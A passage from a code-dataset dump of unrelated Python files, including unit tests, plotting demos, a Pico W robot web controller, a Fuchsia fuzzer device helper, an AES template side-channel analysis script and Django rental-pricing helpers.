nums1,nums2,nums3 = [3,1], [2,3], [1,2]\n Output= sorted([2,3,1])\n self.assertEqual(Output, sorted(get_sol().twoOutOfThree(nums1,nums2,nums3)))\n def test3(self):\n nums1,nums2,nums3 = [1,2,2], [4,3,3], [5]\n Output= sorted([])\n self.assertEqual(Output, sorted(get_sol().twoOutOfThree(nums1,nums2,nums3)))\n # def test4(self):\n # def test5(self):\n # def test6(self):\n","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/leetcode/lc2032.py","file_name":"lc2032.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"13515652532","text":"import unittest\nfrom io import StringIO\n\nfrom robot.output.filelogger import FileLogger\nfrom robot.utils.asserts import assert_equal\n\n\nclass LoggerSub(FileLogger):\n\n def _get_writer(self, path):\n return StringIO()\n\n def message(self, msg):\n msg.timestamp = '2023-09-08 12:16:00.123456'\n super().message(msg)\n\n\nclass TestFileLogger(unittest.TestCase):\n\n def setUp(self):\n self.logger = LoggerSub('whatever', 'INFO')\n\n def test_write(self):\n self.logger.write('my message', 'INFO')\n expected = '2023-09-08 12:16:00.123456 | INFO | my message\\n'\n self._verify_message(expected)\n self.logger.write('my 2nd msg\\nwith 2 lines', 'ERROR')\n expected += '2023-09-08 12:16:00.123456 | ERROR | my 2nd msg\\nwith 2 lines\\n'\n self._verify_message(expected)\n\n def test_write_helpers(self):\n self.logger.info('my message')\n expected = '2023-09-08 12:16:00.123456 | INFO | my message\\n'\n self._verify_message(expected)\n self.logger.warn('my 2nd msg\\nwith 2 lines')\n expected += '2023-09-08 12:16:00.123456 | WARN | my 2nd msg\\nwith 2 lines\\n'\n self._verify_message(expected)\n\n def test_set_level(self):\n self.logger.write('msg', 'DEBUG')\n self._verify_message('')\n self.logger.set_level('DEBUG')\n self.logger.write('msg', 'DEBUG')\n self._verify_message('2023-09-08 12:16:00.123456 | DEBUG | msg\\n')\n\n def _verify_message(self, expected):\n assert_equal(self.logger._writer.getvalue(), expected)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"robotframework/robotframework","sub_path":"utest/output/test_filelogger.py","file_name":"test_filelogger.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":8521,"dataset":"github-code","pt":"21"} +{"seq_id":"1706275384","text":"# IMPORTANDO BIBLIOTECAs\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n# TRAÇANDO UM GRÁFICO\nx = np.array([1,2,3,4])\ny = x*2 # broadcasting\n\ny2 = x*x # operação indice a indice (np array * np array)\n\nplt.xlabel('Valores de X')\nplt.ylabel('Valores de Y')\n\n# s = coloca marcadores quadrado / r = faz a linha do grafico ficar pontilhada\n# linewidth = tamanho da linha / markersize = tamanho do marcador\n# plt.plot(x,y, 's:r', linewidth=3, markersize=20)\n\n# O = bolinha / G = green\n# plt.plot(x, y2, 'o--g', linewidth=3, markersize=20)\n\n''' \n OBS: pode plotar dois graficos em uma linha\n plt.plot(x,y, 's:r', x, y2, 'o--g', linewidth=3, markersize=20)\n'''\n# linha, coluna, posição\nplt.subplot(1,2,1)\nplt.plot(x, y, 's:r')\n\nplt.subplot(1,2,2)\nplt.plot(x, y2, 'o--g')\n\nplt.show()\n","repo_name":"LiviaJacklinne/INATEL-C111","sub_path":"Aula/04-Matplotlib/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43938810008","text":"import torch\nfrom . utils import largest_divisor\nimport matplotlib.pyplot as plt\nfrom typing import List\n\n\ndef lines_multiplot(lines: List[List[float]],\n title: str,\n y_label: str,\n x_label: str,\n save_file: str,\n multiplot_labels: List[str]):\n \"\"\"\n creates multiple lines in the same subplot.\n\n :param lines: float representations of lines to plot\n :type lines: List[List[float]]\n\n :param title: figure title\n :type title: str\n\n :param multiplot_labels: line labels\n :type multiplot_labels: List[str]\n\n :param y_label: y label\n :type y_label: str\n\n :param x_label: x label\n :type x_label: str\n\n :param save_file: name of the file in which the figure is stored\n :type save_file: str\n \"\"\"\n plt.figure(figsize=(4, 4))\n for i, line in enumerate(lines):\n plt.plot(range(len(line)), line, label=multiplot_labels[i])\n plt.title(title)\n plt.ylabel(y_label)\n plt.xlabel(x_label)\n plt.legend()\n plt.tight_layout()\n plt.ticklabel_format(useOffset=False)\n plt.savefig(save_file)\n\n\ndef images_subplot(images: List[torch.Tensor],\n title: str,\n subplot_titles: List[str],\n save_file: str):\n \"\"\"\n creates multiple subplots within one figure.\n each subplot shows an image.\n\n :param images: torch Tensors representing RGB images\n :type images: List[torch.Tensor]\n\n :param title: figure title\n :type title: str\n\n :param subplot_titles: image labels\n :type subplot_titles: List[str]\n\n :param save_file: name of the file in which the figure is stored\n :type save_file: str\n \"\"\"\n n_images = len(images)\n num_cols = largest_divisor(n=n_images)\n num_rows = n_images // num_cols\n fig, axs = plt.subplots(num_rows, num_cols, figsize=(num_cols * 4, num_rows * 4))\n plt.suptitle(title)\n if num_cols == 1:\n for i, img in enumerate(images):\n image_tensor = images[i].detach()\n image_array = image_tensor.permute(1, 2, 0).numpy()\n axs[i].imshow(image_array)\n axs[i].set_title(subplot_titles[i])\n axs[i].axis('off')\n else:\n for i, img in enumerate(images):\n row_idx = i // num_cols\n col_idx = i % num_cols\n image_tensor = images[i].detach()\n image_array = image_tensor.permute(1, 2, 0).numpy()\n axs[row_idx, col_idx].imshow(image_array)\n axs[row_idx, col_idx].set_title(subplot_titles[i])\n axs[row_idx, col_idx].axis('off')\n plt.tight_layout()\n plt.savefig(save_file)\n\n\ndef lines_subplot(lines: List[List[float]],\n title: str,\n subplot_titles: List[str],\n y_label: str,\n x_label: str,\n save_file: str):\n \"\"\"\n creates multiple subplots within one figure.\n each subplot is a line plot.\n\n :param lines: float representations of lines to plot\n :type lines: List[List[float]]\n\n :param title: figure title\n :type title: str\n\n :param subplot_titles: line labels\n :type subplot_titles: List[str]\n\n :param y_label: y label\n :type y_label: str\n\n :param x_label: x label\n :type x_label: str\n\n :param save_file: name of the file in which the figure is stored\n :type save_file: str\n \"\"\"\n n_lines = len(lines)\n n_cols = largest_divisor(n=n_lines)\n n_rows = n_lines // n_cols\n plt.figure(figsize=(n_cols * 4, n_rows * 4))\n plt.suptitle(title)\n for i in range(n_lines):\n plt.subplot(n_rows, n_cols, i + 1)\n plt.title(subplot_titles[i])\n plt.ylabel(y_label)\n plt.xlabel(x_label)\n plt.ticklabel_format(useOffset=False)\n plt.plot(range(len(lines[i])), lines[i])\n plt.tight_layout()\n plt.savefig(save_file)\n","repo_name":"MilanKalkenings/pypi_package","sub_path":"src/milankalkenings/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72160630454","text":"import sys\nfrom collections import deque\n\nclass Node:\n def __init__(self, index) -> None:\n self.index = index # 自分の番号 (頂点)\n self.parents = [] # 親ノードのインデックスのリスト\n self.children = [] # 子ノードのインデックスのリスト\n self.toporo = 0\n self.memo = [] # 親ノードのリスト\n \n def __repr__(self) -> str:\n return f'[Node {self.index} : toporo: {self.toporo}]'\n\n\n# def run(n,m):\ndef run():\n input = sys.stdin.readline\n n,m = map(int, input().split())\n\n nodes = []\n for i in range(n+1):\n nodes.append(Node(i))\n \n print(nodes)\n \n for _ in range(m):\n s,d = map(int, input().split())\n nodes[s].children.append(d)\n nodes[d].parents.append(s)\n nodes[d].memo.append(s)\n queue = deque()\n\n # 親ノードを持たない Node をキューに追加 (探索のスタート地点)\n for node in nodes:\n if len(node.parents) == 0:\n queue.append(node)\n \n print(queue)\n \n # トポロジカル順序を初期化\n order = 1\n\n while queue:\n node = queue.pop() # LIFO で深さ優先する\n nodes[node.index].toporo = order\n order += 1\n\n children = node.children\n for child in children:\n nodes[child].parents.remove(node.index) # \n \n if len(nodes[child].parents) == 0:\n queue.append(nodes[child])\n print(nodes)\n # Node 0 が toporo 順序の最大値 (入力例 1 なら Node 0 が toporo 5 になる) になるので、Node 0 を消す → LIFO だから Node 0 が最後まで残るから order が最大になる\n toporo_nodes = sorted(nodes, key=lambda x: x.toporo)[: -1]\n\n # dp[i+1]: トポロジカル順序 i の Node まで調べた時、その Node を徹最長経路\n dp = [0] * (n)\n for i in range(1, n):\n if len(toporo_nodes[i].memo) > 0:\n dp[i] = max([dp[j-1] for j in [nodes[k].toporo for k in toporo_nodes[i].memo]]) + 1\n \n print(max(dp))\n\n\nif __name__ == '__main__':\n # n,m = map(int, input().split())\n # run(n,m)\n run()\n\n","repo_name":"NozomiTakiguchi/atcoder","sub_path":"src/ALGORITHM/Dp/EDPC/g.py","file_name":"g.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38500827141","text":"import network\nimport socket\nfrom time import sleep\nimport machine\nfrom machine import Pin\n\nssid = 'Ingresa el nombre de tu red WiFi'\npassword = 'Ingresa contraseña de tu red WiFi'\n\nMotor_A_Adelante = Pin(18, Pin.OUT)\nMotor_A_Atras = Pin(19, Pin.OUT)\nMotor_B_Adelante = Pin(20, Pin.OUT)\nMotor_B_Atras = Pin(21, Pin.OUT)\n\ndef adelante():\n Motor_A_Adelante.value(1)\n Motor_B_Adelante.value(1)\n Motor_A_Atras.value(0)\n Motor_B_Atras.value(0)\n \ndef atras():\n Motor_A_Adelante.value(0)\n Motor_B_Adelante.value(0)\n Motor_A_Atras.value(1)\n Motor_B_Atras.value(1)\n\ndef detener():\n Motor_A_Adelante.value(0)\n Motor_B_Adelante.value(0)\n Motor_A_Atras.value(0)\n Motor_B_Atras.value(0)\n\ndef izquierda():\n Motor_A_Adelante.value(1)\n Motor_B_Adelante.value(0)\n Motor_A_Atras.value(0)\n Motor_B_Atras.value(1)\n\ndef derecha():\n Motor_A_Adelante.value(0)\n Motor_B_Adelante.value(1)\n Motor_A_Atras.value(1)\n Motor_B_Atras.value(0)\n\n\ndetener()\n \ndef conectar():\n red = network.WLAN(network.STA_IF)\n red.active(True)\n red.connect(ssid, password)\n while red.isconnected() == False:\n print('Conectando ...')\n sleep(1)\n ip = red.ifconfig()[0]\n print(f'Conectado con IP: {ip}')\n return ip\n \ndef open_socket(ip):\n address = (ip, 80)\n connection = socket.socket()\n connection.bind(address)\n connection.listen(1)\n return connection\n\ndef pagina_web():\n html = f\"\"\"\n \n \n \n \n \n
    \n
    \n \n
    \n \n \n \n \n
    \n \n
    \n \n
    \n \n
    \n
    \n \n
    \n \n \n \"\"\"\n return str(html)\n\ndef serve(connection):\n while True:\n cliente = connection.accept()[0]\n peticion = cliente.recv(1024)\n peticion = str(peticion)\n try:\n peticion = peticion.split()[1]\n except IndexError:\n pass\n if peticion == '/adelante?':\n adelante()\n elif peticion =='/izquierda?':\n izquierda()\n elif peticion =='/detener?':\n detener()\n elif peticion =='/derecha?':\n derecha()\n elif peticion =='/atras?':\n atras()\n html = pagina_web()\n cliente.send(html)\n cliente.close()\n\ntry:\n ip = conectar()\n connection = open_socket(ip)\n serve(connection)\nexcept KeyboardInterrupt:\n machine.reset()\n\n \n","repo_name":"ComputadorasySensores/Capitulo75","sub_path":"picow-robot.py","file_name":"picow-robot.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"71220177014","text":"import glob\nimport os\nimport re\nimport shutil\nimport subprocess\n\nimport six\n\nfrom .host import Host\n\n\nclass Device(object):\n \"\"\"Represents a Fuchsia device attached to a host.\n\n This class abstracts the details of remotely running commands and\n transferring data to and from the device.\n\n Attributes:\n host: A Host object represent the local platform attached to this target\n device.\n \"\"\"\n\n @classmethod\n def from_args(cls, host, args):\n \"\"\"Constructs a Device from command line arguments.\"\"\"\n netaddr_cmd = ['netaddr', '--fuchsia', '--nowait']\n default_device = '{}.device'.format(host.build_dir)\n if args.device:\n netaddr_cmd.append(args.device)\n elif os.path.exists(default_device):\n with open(default_device) as f:\n netaddr_cmd.append(f.read().strip())\n try:\n netaddr = host.zircon_tool(netaddr_cmd)\n except subprocess.CalledProcessError:\n raise RuntimeError('Unable to find device; try `fx set-device`.')\n device = cls(host, netaddr)\n if not host.build_dir:\n raise Host.ConfigError('Unable to find SSH configuration.')\n device.set_ssh_config(Host.join(host.build_dir, 'ssh-keys', 'ssh_config'))\n return device\n\n def __init__(self, host, addr, port=22):\n self.host = host\n self._addr = addr\n self._ssh_opts = {}\n if port != 22:\n self._ssh_opts['p'] = [str(port)]\n\n def set_ssh_config(self, config_file):\n \"\"\"Sets the SSH arguments to use a config file.\"\"\"\n if not os.path.exists(config_file):\n raise Host.ConfigError('Unable to find SSH configuration.')\n self._ssh_opts['F'] = [config_file]\n\n def set_ssh_identity(self, identity_file):\n if not os.path.exists(identity_file):\n raise Host.ConfigError('Unable to find SSH identity.')\n self._ssh_opts['i'] = [identity_file]\n\n def set_ssh_option(self, option):\n \"\"\"Sets SSH configuration options. Can be used multiple times.\"\"\"\n if 'o' in self._ssh_opts:\n self._ssh_opts['o'].append(option)\n else:\n self._ssh_opts['o'] = [option]\n\n def set_ssh_verbosity(self, level):\n \"\"\"Sets how much debugging SSH prints. Default is 0 (none), max is 3.\"\"\"\n for i in range(1, 4):\n opt = 'v' * i\n if level == i and not opt in self._ssh_opts:\n self._ssh_opts[opt] = []\n elif level != i and opt in self._ssh_opts:\n del self._ssh_opts[opt]\n\n def get_ssh_cmd(self, cmd):\n \"\"\"Returns the SSH executable and options.\"\"\"\n result = cmd[:1]\n for opt, args in six.iteritems(self._ssh_opts):\n if result[0] == 'scp' and opt == 'p':\n opt = 'P'\n if not args:\n result.append('-' + opt)\n else:\n for arg in args:\n result.append('-' + opt)\n result.append(arg)\n return result + cmd[1:]\n\n def _ssh(self, cmdline, stdout=subprocess.PIPE):\n \"\"\"Internal wrapper around _rexec that adds the ssh command and config.\n\n Don't call this directly. This method exists to be overridden in testing.\n\n Args:\n cmdline: List of command line arguments to execute on device\n stdout: Same as for subprocess.Popen\n\n Returns:\n If check was false, a subprocess.Popen object representing the running\n child process.\n\n Raises: A Process object.\n \"\"\"\n args = self.get_ssh_cmd(['ssh', self._addr] + cmdline)\n return self.host.create_process(\n args, stdout=stdout, stderr=subprocess.STDOUT)\n\n def ssh(self, cmdline, quiet=True, logfile=None):\n \"\"\"Runs a command to completion on the device.\n\n Connects to the target device and executes a shell command. Output from\n the shell command is sent to stdout, and may optionally be saved to a file\n via the POSIX utility 'tee'.\n\n Args:\n cmdline: A list of command line arguments, starting with the command to\n execute.\n logfile: An optional pathname to save a copy of the command output to. The\n output will also still be sent to stdout.\n \"\"\"\n if quiet:\n if logfile:\n with open(logfile, 'w') as f:\n return self._ssh(cmdline, stdout=f).call()\n return self._ssh(cmdline, stdout=Host.DEVNULL).call()\n\n if logfile:\n p1 = self._ssh(cmdline, stdout=subprocess.PIPE).popen()\n p2 = self.host.create_process(['tee', logfile], stdin=p1.stdout)\n return p2.check_call()\n return self._ssh(cmdline, stdout=None).call()\n\n def getpids(self):\n \"\"\"Maps names to process IDs for running fuzzers.\n\n Connects to the device and checks which fuzz targets have a matching entry\n in the component list given by 'cs'. This matches on *only* the first 32\n characters of the component manifest and package URL. This is due to 'cs'\n being limited to returning strings of length `ZX_MAX_NAME_LEN`, as defined\n in //zircon/system/public/zircon/types.h.\n\n Returns:\n A dict mapping fuzz target names to process IDs. May be empty if no\n fuzzers are running.\n \"\"\"\n p = self._ssh(['cs'], stdout=subprocess.PIPE).popen()\n out, _ = p.communicate()\n pids = {}\n for fuzzer in self.host.fuzzers:\n tgt = (fuzzer[1] + '.cmx')[:32]\n url = ('fuchsia-pkg://fuchsia.com/%s#meta' % fuzzer[0])[:32]\n for line in out.decode('utf-8').split('\\n'):\n match = re.search(tgt + r'\\[(\\d+)\\]: ' + url, line)\n if match:\n pids[fuzzer[1]] = int(match.group(1))\n return pids\n\n def ls(self, path):\n \"\"\"Maps file names to sizes for the given path.\n\n Connects to a Fuchsia device and lists the files in a directory given by\n the provided path. Ignore non-existent paths.\n\n Args:\n path: Absolute path to a directory on the device.\n\n Returns:\n A dict mapping file names to file sizes, or an empty dict if the path\n does not exist.\n \"\"\"\n results = {}\n try:\n p = self._ssh(['ls', '-l', path], stdout=subprocess.PIPE).popen()\n out, _ = p.communicate()\n for line in out.decode('utf-8').split('\\n'):\n # Line ~= '-rw-r--r-- 1 0 0 8192 Mar 18 22:02 some-name'\n parts = line.split()\n # When we're running ls over ssh, we may get a note about\n # \"Warning: Permanently added [address] to the list of known hosts\"\n # Don't try to treat those as file paths\n if len(parts) > 8 and 'Warning:' not in parts:\n results[' '.join(parts[8:])] = int(parts[4])\n except subprocess.CalledProcessError:\n pass\n return results\n\n def rm(self, pathname, recursive=False):\n \"\"\"Removes a file or directory from the device.\"\"\"\n args = ['rm']\n if recursive:\n args.append('-r')\n args.append(pathname)\n self.ssh(args)\n\n def _dump_log(self, args):\n \"\"\"Retrieve a syslog from the device.\"\"\"\n p = self._ssh(['log_listener', '--dump_logs', 'yes'] + args)\n return p.check_output()\n\n def _guess_pid(self):\n \"\"\"Tries to guess the fuzzer process ID from the device syslog.\n\n This will assume the last line which contained one of the strings\n '{{{reset}}}', 'libFuzzer', or 'Sanitizer' is the fuzzer process, and\n try to extract its PID.\n\n Returns:\n The PID of the process suspected to be the fuzzer, or -1 if no\n suitable candidate was found.\n \"\"\"\n out = self._dump_log(['--only', 'reset,Fuzzer,Sanitizer'])\n pid = -1\n for line in out.split(b'\\n'):\n # Log lines are like '[timestamp][pid][tid][name] data'\n parts = line.split(b'][')\n if len(parts) > 2:\n pid = int(parts[1])\n return pid\n\n def process_logs(self, logfile, guess_pid=False, retcode=0):\n \"\"\"Constructs a symbolized fuzzer log from a device.\n\n Merges the provided fuzzer log with the symbolized system log for the\n fuzzer process.\n\n Args:\n logfile: Absolute path to a fuzzer's log file.\n guess_pid: If true and the fuzzer process ID cannot be found in the\n fuzzer log, the process ID is picked from candidates in the system\n log.\n\n Returns:\n A list of the test artifacts (e.g. crashes) reported in the logs.\n \"\"\"\n pid = -1\n pid_pattern = re.compile(br'==([0-9]+)==')\n mutation_pattern = re.compile(br'^MS: [0-9]*')\n artifacts = []\n artifact_pattern = re.compile(br'Test unit written to data/(\\S*)')\n repro_pattern = re.compile(br'Running: .*')\n line_with_crash_message = None\n with open(logfile, 'rb') as log:\n with open(logfile + '.tmp', 'wb') as tmp:\n for line in log:\n # Check for a line that tells us the process ID\n match = pid_pattern.search(line)\n if match:\n line_with_crash_message = line\n pid = int(match.group(1))\n\n # Check for one of two things:\n # 1) a unit being dumped (e.g. a finding from a regular fuzz run)\n # 2) a nonzero return code plus a \"Running: [foo]\" message (which\n # indicates this is a *reproducer* run that has successfully crashed)\n repro_match = repro_pattern.search(line)\n match = mutation_pattern.search(line)\n if match or (repro_match and retcode):\n if pid <= 0 and guess_pid:\n pid = self._guess_pid()\n if pid > 0:\n raw = self._dump_log(['--pid', str(pid)])\n sym = self.host.symbolize(raw)\n tmp.write(b'\\n'.join(sym))\n tmp.write(b'\\n')\n\n # Check for an artifact being reported.\n match = artifact_pattern.search(line)\n if match:\n artifacts.append(match.group(1))\n\n # Echo the line\n tmp.write(line)\n\n # Clusterfuzz's stack analyzer expects the\n # `==[num]== ERROR: [SanitizerName]: [failure type]` line\n # to occur *before* the stacktrace, so make a new tempfile\n # where we insert that line at the top.\n # TODO(flowerhack): Change the log output in Fuchsia itself, s.t. the\n # ordering is correct the *first* time, and we won't have to do this\n # fix-up-the-logs dance!\n with open(logfile + '.tmp', 'rb') as tmp:\n with open(logfile, 'wb') as final:\n if line_with_crash_message:\n final.write(line_with_crash_message)\n\n shutil.copyfileobj(tmp, final)\n\n os.remove(logfile + '.tmp')\n return artifacts\n\n def _scp(self, srcs, dst):\n \"\"\"Copies `src` to `dst`.\n\n Don't call directly; use `fetch` or `store` instead.`\n\n Args:\n srcs: Local or remote paths to copy from.\n dst: Local or remote path to copy to.\n \"\"\"\n args = self.get_ssh_cmd(['scp'] + srcs + [dst])\n p = self.host.create_process(args)\n p.call()\n\n def fetch(self, data_src, host_dst):\n \"\"\"Copies `data_src` on the target to `host_dst` on the host.\"\"\"\n if not os.path.isdir(host_dst):\n raise ValueError(host_dst + ' is not a directory')\n self._scp(['[{}]:{}'.format(self._addr, data_src)], host_dst)\n\n def store(self, host_src, data_dst):\n \"\"\"Copies `host_src` on the host to `data_dst` on the target.\"\"\"\n self.ssh(['mkdir', '-p', data_dst])\n srcs = glob.glob(host_src)\n if not srcs:\n return\n self._scp(srcs, '[{}]:{}'.format(self._addr, data_dst))\n","repo_name":"JZ1324/Hi","sub_path":"src/clusterfuzz/_internal/platforms/fuchsia/util/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":11055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9787065143","text":"# Pickling and unpickling\n\nimport pickle as p\n\nshoplistfile = 'shoplist.data'\nshoplist = ['apple', 'mango', 'carrot']\n\n# Be careful: the output file and input file need to be opened in binary mode.\n# More details: https://stackoverflow.com/questions/13906623/using-pickle-dump-typeerror-must-be-str-not-bytes\n\n# Write to the file\nf = open(shoplistfile, 'wb')\np.dump(shoplist, f) # Dump the object to a file\nf.close()\n\n# Read back from the storage\nf = open(shoplistfile, 'rb')\nstoredlist = p.load(f)\nprint(storedlist)\n","repo_name":"tinylcy/snippets","sub_path":"A Byte of Python/ch12/pickling.py","file_name":"pickling.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"11799994743","text":"import numpy\nimport matplotlib.pyplot as plt\n\nfrom pca import *\nfrom file_operate import *\nfrom utils import *\n\n\nclass TA:\n '''\n An implementation of TA on 1 Byte of AES, the leak model is Hamming Weight by default.\n '''\n leak_model = None\n leak_range = None\n pois = None\n mean_matrix = None\n cov_matrix = None\n\n def __init__(self, traces, plain_texts, real_key, num_pois, leak_model=HW, poi_spacing=5):\n [trace_num, trace_point] = traces.shape\n self.leak_range = max(leak_model) + 1\n self.leak_model = leak_model\n self.mean_matrix = np.zeros((self.leak_range, num_pois))\n self.cov_matrix = np.zeros((self.leak_range, num_pois, num_pois))\n temp_SBOX = [SBOX[plain_texts[i] ^ real_key] for i in range(trace_num)]\n temp_lm = [leak_model[s] for s in temp_SBOX]\n # Sort traces by HW\n # Make self.leak_range blank lists - one for each Hamming weight\n temp_traces_lm = [[] for _ in range(self.leak_range)]\n # Fill them up\n for i, trace in enumerate(traces):\n temp_traces_lm[temp_lm[i]].append(trace)\n for mid in range(self.leak_range):\n assert len(temp_traces_lm[\n mid]) != 0, \"No trace with leak model value = %d, try increasing the number of traces\" % mid\n # Switch to numpy arrays\n temp_traces_lm = [np.array(temp_traces_lm[_]) for _ in range(self.leak_range)]\n # Find averages\n tempMeans = np.zeros((self.leak_range, trace_point))\n for mid in range(self.leak_range):\n tempMeans[mid] = np.average(temp_traces_lm[mid], 0)\n # Find sum of differences\n tempSumDiff = np.zeros(trace_point)\n for i in range(self.leak_range):\n for j in range(i):\n tempSumDiff += np.abs(tempMeans[i] - tempMeans[j])\n # Find POIs\n self.pois = []\n for i in range(num_pois):\n # Find the max\n nextPOI = tempSumDiff.argmax()\n self.pois.append(nextPOI)\n # Make sure we don't pick a nearby value\n\n poiMin = max(0, nextPOI - poi_spacing)\n poiMax = min(nextPOI + poi_spacing, len(tempSumDiff))\n for j in range(poiMin, poiMax):\n tempSumDiff[j] = 0\n # Fill up mean and covariance matrix for each HW\n self.mean_matrix = np.zeros((self.leak_range, num_pois))\n self.cov_matrix = np.zeros((self.leak_range, num_pois, num_pois))\n for mid in range(self.leak_range):\n for i in range(num_pois):\n # Fill in mean\n self.mean_matrix[mid][i] = tempMeans[mid][self.pois[i]]\n for j in range(num_pois):\n x = temp_traces_lm[mid][:, self.pois[i]]\n y = temp_traces_lm[mid][:, self.pois[j]]\n self.cov_matrix[mid, i, j] = cov(x, y)\n print(\"The template has been created.\")\n return\n\n def attack(self, traces, plaintext):\n rank_key = np.zeros(256)\n for j, trace in enumerate(traces):\n # Grab key points and put them in a small matrix\n a = [trace[poi] for poi in self.pois]\n\n # Test each key\n for k in range(256):\n # Find leak model coming out of sbox\n mid = self.leak_model[SBOX[plaintext[j] ^ k]]\n\n # Find p_{k,j}\n # print(np.linalg.det(self.cov_matrix[mid]))\n rv = multivariate_normal(self.mean_matrix[mid], self.cov_matrix[mid], allow_singular=True)\n p_kj = PRE[mid] * rv.pdf(a)\n\n # Add it to running total\n rank_key[k] += np.log(p_kj)\n\n guessed = rank_key.argsort()[-1]\n print(\"Key found: %d\" % guessed)\n return self.mean_matrix, self.cov_matrix, guessed\n\n\nif __name__ == '__main__':\n # Setting for data operation, the REAL KEY is 66\n filename = r'mega128a5V4M_origin'\n path = r'./data'\n trace_num = 10000\n train_key = 66\n\n # Transfer trs to npz\n trs2Npz(path, filename, filename, trace_num)\n target = np.load(path + '\\\\' + filename + '.npz')\n raw_traces = target[\"trace\"]\n plaintexts = target[\"crypto_data\"]\n\n # Normalization on raw data traces\n traces = standardize(raw_traces)\n\n # If you need PCA, uncomment this\n pca = PCA(traces, explain_ratio=0.95)\n traces = pca.proj(traces)\n\n # Train set\n num_train = 9800\n train_tr = traces[:num_train, :]\n train_pt = plaintexts[:num_train]\n # Attack set\n attack_tr = traces[num_train:, :]\n attack_pt = plaintexts[num_train:]\n\n # Get a TA attacker\n ta = TA(traces=train_tr, plain_texts=train_pt, real_key=train_key, num_pois=5)\n mean_matrix, cov_matrix, guessed = ta.attack(attack_tr, attack_pt)\n","repo_name":"itewqq/TemplateSideChannelAttack","sub_path":"ta.py","file_name":"ta.py","file_ext":"py","file_size_in_byte":4784,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"13628638001","text":"from django.db.models import Q\nfrom django.http import JsonResponse\n\nfrom dgsys2.models import *\nfrom datetime import date, datetime\n\n\ndef occupied_response():\n return JsonResponse({'error': 'Selected equipment is occupied'}, status=412)\n\n\ndef equipment_is_available(equipmentIds, from_date, to_date, include_reservations=True):\n available = True\n\n for eq_id in equipmentIds:\n rentals = Rental.objects.filter(\n equipment_articles__id=eq_id,\n start_date__lt=to_date,\n end_date__gt=from_date\n ).count()\n\n if rentals > 0:\n available = False\n\n if include_reservations and available:\n reservations = Reservation.objects.filter(\n equipment_articles__id=eq_id,\n start_date__lt=to_date,\n end_date__gt=from_date\n ).count()\n\n if reservations > 0:\n available = False\n\n return available\n\n\ndef serializeEquipment(item, request, from_date=None, to_date=None):\n price = EquipmentPrice.objects.filter(\n equipment_article__id=item.id,\n membership=request.user.membership\n ).values('price')[0]['price']\n\n occupants = \"\"\n\n is_rented = False\n is_reserved = False\n\n if from_date is not None and to_date is not None:\n print()\n rentees = Rental.objects.filter(\n Q(end_date__gt=from_date) | Q(end_date__isnull=True),\n equipment_articles__label=item.label,\n start_date__lt=to_date\n ).values(\"user__first_name\", \"user__last_name\").distinct()\n is_rented = rentees.count() > 0\n\n reservators = Reservation.objects.filter(\n equipment_articles__label=item,\n start_date__lt=to_date,\n end_date__gt=from_date\n ).values(\"user__first_name\", \"user__last_name\").distinct()\n is_reserved = reservators.count() > 0\n\n occupants_qs = reservators.union(rentees).distinct()\n\n for o in occupants_qs:\n if len(occupants) > 0:\n occupants += \", \"\n occupants += o['user__first_name'] + \" \" + o['user__last_name'][0]\n\n item_dict = {\n 'category': item.category.label,\n 'category_id': item.category_id,\n 'id': item.id,\n 'description': item.description,\n 'label': item.label,\n 'price': price,\n 'occupants': occupants,\n 'is_reserved': is_reserved,\n 'is_rented': is_rented\n }\n\n return item_dict\n\n\ndef total_rental_price(user, items, start_date, end_date):\n start_date = start_date.replace(tzinfo=None)\n end_date = end_date.replace(tzinfo=None)\n\n date_difference = end_date - start_date\n\n if date_difference.days > 2 and user.membership.id == 2:\n membership = Membership.objects.get(pk=3)\n else:\n membership = user.membership\n\n days_rented = date_difference.days + 1\n\n total_price = 0\n\n for item in items:\n item_price = EquipmentPrice.objects.get(\n equipment_article=item,\n membership=membership\n ).price\n\n total_price += item_price * days_rented\n\n return total_price\n\n\ndef upgrade_if_eligible(user):\n if user.is_member():\n intervals = select_semester(date.today())\n end_date = intervals['end']\n start_date = intervals['start']\n rentals_this_semester = Rental.objects.filter(\n user=user,\n end_date__gte=start_date,\n end_date__lte=end_date,\n ).count()\n\n if rentals_this_semester >= 5:\n user.membership = Membership.objects.get(pk=3)\n user.save()\n return True\n return False\n\n\ndef select_semester(check_date: date):\n current_year = date.today().year\n if date(current_year, 9, 1) >= check_date >= date(current_year, 12, 31):\n return {'start': datetime(current_year, 9, 1), 'end': datetime(current_year, 12, 31)}\n else:\n return {'start': datetime(current_year, 1, 1), 'end': datetime(current_year, 8, 31)}\n\n\ndef reset_plus_memberships():\n plus_members = User.objects.get(membership=3).all()\n for member in plus_members:\n member.membership = Membership.objects.get(pk=2).first()\n member.save()\n\n\ndef serialized_items(user):\n membership = user.membership\n itemset = Item.objects.all()\n result = []\n for item in itemset:\n try:\n price = ItemPrice.objects.get(\n item=item,\n membership=membership\n )\n print(price)\n result.append({\n 'id': item.id,\n 'label': item.label,\n 'price': price.price,\n 'rental_related': item.rental_related,\n 'price_per_unit': item.price_per_unit\n })\n except ItemPrice.DoesNotExist:\n result.append({\n 'id': 